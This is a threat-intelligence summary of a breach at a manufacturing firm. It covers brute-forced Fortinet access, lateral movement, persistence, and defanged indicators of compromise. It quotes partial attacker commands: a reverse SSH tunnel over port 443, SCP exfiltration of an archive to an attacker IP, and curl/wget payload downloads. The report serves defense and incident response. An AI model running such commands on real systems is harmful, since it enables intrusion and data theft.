Keypoints
- Initial access was likely via a brute-force of the Fortinet administrator console, leading to use of a privileged service account (SVC_1).
- The actor authenticated via SSH to a Linux development server and used living-off-the-land commands for discovery (ps, cat /etc/passwd, net view, etc.).
- Lateral movement used SSH for Linux and RDP for Windows, targeting hosts without EDR or sufficient logging.
- Privilege escalation and persistence were achieved by running sudo su, creating local users (itsupport), and editing /etc/sudoers directly.
- Command-and-control involved wget/curl to download payloads from Vultr-hosted IPs and creating reverse SSH tunnels over port 443 to DigitalOcean hosts.
- Execution attempts of a tarball payload were blocked by EDR; exfiltration attempts used WinRAR to archive data and SCP to transfer archives over ports 443/80 to attacker-controlled IPs.
- Mitigations emphasized: patch perimeter devices, harden and monitor service accounts, ensure full EDR coverage, network segmentation, and block anomalous app traffic on non-standard ports.
MITRE Techniques
- [T1078] Valid Accounts – Brute-forced and abused a privileged service account (SVC_1) to authenticate and gain access. [‘Brute-forced privileged service account to gain access.’]
- [T1021] Remote Services – Used SSH for Linux and RDP for Windows to move laterally between hosts. [‘Used SSH and RDP for lateral movement between servers.’]
- [T1068] Exploitation for Privilege Escalation – Escalated privileges by running sudo su and creating new administrative users. [‘Escalated privileges using “sudo su” and created new user accounts.’]
- [T1041] Exfiltration Over C2 Channel – Compressed data with WinRAR and transferred archives via SCP to attacker-controlled servers over HTTP/S ports. [‘Used SCP and WinRAR to exfiltrate data to C2 servers.’]
- [T1071] Application Layer Protocol – Retrieved payloads via HTTP(S) and used non-standard ports (e.g., SSH over 443) for C2. [‘Established C2 communication using non-standard ports.’]
- [T1218] Signed Binary Proxy Execution / Defense Evasion – Installed and ran unauthorized software and manually edited sudoers to avoid detection, using common binaries and LotL commands. [‘Modified the sudoers file and installed unauthorized software to evade detection.’]
Indicators of Compromise
- [IP Address] C2 and payload hosts – 149.28.219[.]210, 192.241.139[.]130, and 4 more IPs (45.77.94[.]53, 209.250.244[.]179, 167.172.134[.]147, 64.94.85[.]219).
- [File Names] Payloads and tools observed – payload.tar.gz, DATA.rar, winrar-x64-701.exe.
- [Usernames / Accounts] Service and persistence accounts – SVC_1 (compromised service account), itsupport (attacker-created local admin account).
- [Tools / Domains] Download and tooling locations – curl/wget retrieval from hxxp[:]//149.28.219[.]210 and cdn.stubdownloader.services.mozilla.com (Firefox installer), the.earth[.]li (pscp.exe).
- [Commands / Artifacts] Notable commands used for persistence, C2, and exfiltration – ssh -R reverse tunnel over -p443, scp DATA.rar … -P 443 (SCP over HTTPS port), nohup /tmp/payload (execution attempts blocked by EDR).
The technical sequence began with likely brute-force compromise of an internet-facing Fortinet appliance and discovery of a privileged service account (SVC_1). The actor repeatedly tested the account until authenticating via SSH to a Linux development host (Linux_Dev_Server_1). From there they ran living-off-the-land commands (last, ps aux, cat /etc/passwd, net view, quser) to enumerate users, privileges, and reachable network shares, enabling selection of high-value targets and hosts lacking EDR or logging.
Lateral movement used SSH between Linux systems and RDP to reach Windows hosts; the adversary created persistence by running sudo su, adding a local user (itsupport) on Linux and Windows, and attempting to modify /etc/sudoers. Command-and-control activity included downloading payloads with curl/wget from 149.28.219[.]210, establishing reverse SSH tunnels over port 443 to DigitalOcean hosts (ssh -R … -p443), and using SCP to move files to attacker-controlled IPs. Attempts to execute a retrieved tarball (tar xzvf, chmod +x, nohup) were repeatedly blocked by the EDR agent.
For data theft the actor compressed file-share data with WinRAR and transferred archives using OpenSSH SCP over commonly allowed ports (e.g., scp DATA.rar [email protected][.]130 -P 443). Containment actions—EDR blocking, UBA detection, host isolation, account resets, and GreyMatter playbook actions—interrupted exfiltration. Practical controls derived from the incident include prompt patching of perimeter devices, strict service-account restrictions and monitoring, full EDR deployment, network segmentation, and detection/blocking of application traffic on non-standard ports.
Read more: https://www.reliaquest.com/blog/data-exfiltration-attack-analysis-manufacturing-sector-breach/